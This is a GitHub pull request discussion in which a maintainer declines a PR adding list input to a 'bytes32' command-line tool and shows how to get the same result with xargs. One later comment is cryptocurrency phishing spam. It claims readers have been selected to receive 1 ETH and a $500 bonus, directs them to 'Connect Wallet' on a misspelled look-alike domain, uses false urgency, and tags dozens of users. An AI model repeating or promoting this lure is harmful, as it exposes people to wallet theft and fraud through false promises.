### PR TITLE
Add list input option

### PR DESCRIPTION
**Pull request by kauenet**

### CODE REVIEW

**Comment by jjgonecrypto** [comment]
Hi @canokaue. Thanks for the PR, however I am going to close it without merging. 

1. Please check in the future if a feature request is likely to be accepted by creating an issue first. I don't think this change adds much in the way of value - you can use `xargs` in posix systems to pipe lines of output into `bytes32`
2. PRs should never bump versions in `package.json` - this is the job of the open source project once enough updates are deemed sufficient to release a new version.
3. Never submit a PR with a `package-lock.json` change - no self-respecting OSS project should take lockfile updates - it's an attack vector.

**Comment by kauenet** [comment]
hey @justinjmoses thank you so much for the feedback! It all makes sense.

Regarding point 1, can you detail how to achieve this result you mentioned? I'm opening an Issue for that then ;)

Cheers, have a great week

**Comment by jjgonecrypto** [comment]
Sure thing. The following is for macOS, but should work on other posix systems.

If you have newlines in the input, you can use `xargs -L 1 bytes32`, e.g.
```bash
echo "BLAH
TEST
> OTHER" | xargs -L 1 bytes32
```

if you have just space separated values, use `xargs -n 1 bytes32`. E.g.

```bash
echo BLAH TEST OTHER | xargs -n 1 bytes32
```

**Comment by SDH-IT-HO** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
MohamadAli-dev, @mswezey23, @sturmE, @zruzicka, @dougiebuckets, @katticot, @Mahmoud-Mourad-Dev, @Market2199897, @SChapiteau, @jinsley8, @gregorynicholas, @softman123g, @AnandChourasia007, @rpip, @kirtangajjar, @jordanmmck, @TravelingTechGuy, @alant, @winor30, @danielmbirochi, @Lean-b, @buanfund, @clemlak, @sukima-time, @alexey-zaharchenko, @jgh2i, @ernest8725, @ricaurte, @Xander-Polishchuk, @ernest22, @siteriaitaliana, @KiNGxMiDAS, @springrider, @ayuLiao, @Ocean1354, @niallkh, @Ladonna71999, @vanderw, @welps, @vitustockholm, @westonnelson, @MSKose, @gojopunk, @ngocanhth, @SeungWookHan, @0xshawn, @chief-r0cka, @RyanWilkins, @wangjohnny, @prabhupant

**Pull request closed without merging**
